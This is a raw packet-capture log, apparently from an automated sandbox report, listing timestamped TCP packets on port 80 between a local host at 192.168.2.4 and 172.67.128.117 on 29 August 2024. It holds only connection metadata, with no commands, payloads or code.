                                  Aug 29, 2024 23:42:07.217590094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217591047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217602968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217616081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217626095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217626095 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217657089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217677116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.303767920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303786993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303800106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303894043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303905010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303915977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303929090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303941011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.303997040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304008961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304019928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304028034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304028034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304028034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304034948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304048061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304049969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304064035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304075003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304075956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304086924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304095030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304121017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304147959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304351091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304363012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304373980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304385900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304398060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304399967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304411888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304413080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304425001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304436922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304444075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304450989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304461956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304464102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304478884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304493904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304500103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304507971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304521084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304526091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304541111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304569006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304719925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304732084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304744005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304754972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304764032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304766893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304780006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304791927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304795980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304804087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304816008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304822922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304827929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304837942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304852962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304864883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304877996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304886103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304917097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304939985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304951906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304963112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304975986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.304985046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.304989100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305006027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305012941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305042028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305057049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305059910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305099964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305286884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305298090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305308104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305325031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305327892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305336952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305347919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305357933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305358887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305372000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305382013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305389881 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305397034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305408955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305408955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305422068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305433035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305438042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305445910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305458069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305469036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305469036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305481911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305490971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305512905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305536032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305666924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305676937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305712938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305850983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305862904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305872917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305883884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305895090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305906057 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305907011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305918932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305931091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305932045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305943012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305953979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305958986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305974007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305980921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.305988073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.305999041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306010008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306015015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306024075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306052923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306061983 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306201935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306211948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306217909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306224108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306236029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306247950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306247950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306262970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306274891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306288004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306309938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306329012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306341887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306353092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306364059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306375980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306396961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306427002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306559086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306571960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306582928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306595087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306605101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306613922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306626081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306629896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306638956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306652069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306663036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306674004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306687117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306691885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306691885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306691885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306703091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306735039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306755066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306767941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306777954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306787968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306791067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306803942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.306813002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306833982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.306857109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.391705990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391782999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391798019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391814947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391827106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391839027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391851902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391863108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391875982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391885042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391896009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391907930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391923904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391936064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391946077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391958952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391977072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391987085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.391987085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.391987085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.391989946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.391987085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392004013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392010927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392038107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392071962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392102003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392113924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392123938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392136097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392148018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392151117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392175913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392183065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392199993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392203093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392232895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392251968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392263889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392275095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392286062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392309904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392339945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392344952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392350912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392384052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392402887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392411947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392415047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392426968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392438889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392450094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392451048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392492056 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392515898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392530918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392549038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392560959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392585993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392613888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392633915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392646074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392687082 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392756939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392769098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392780066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392793894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392805099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.392811060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392834902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.392857075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393018007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393030882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393040895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393054008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393065929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393071890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393079042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393094063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393111944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393136978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393347979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393393040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393434048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393445015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393459082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393469095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393481016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393488884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393493891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393526077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393531084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393531084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393543959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393554926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393565893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393600941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393624067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393686056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393702030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393714905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393731117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393732071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393743992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393754959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393765926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393776894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393789053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393800020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393802881 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393812895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393812895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393812895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393831968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393845081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393846035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393858910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393866062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393872023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393882990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393891096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393901110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393908024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393908024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393918037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393929958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393939972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393943071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393955946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393959045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393985033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.393985987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.393999100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394010067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394020081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394047976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394062042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394110918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394121885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394131899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394145012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394155979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394156933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394180059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394203901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394278049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394288063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394299030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394310951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394321918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394328117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394326925 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394340992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394380093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394408941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.394423008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394435883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394448042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.394458055 CEST8049730172.67.128.117192.168.2.4
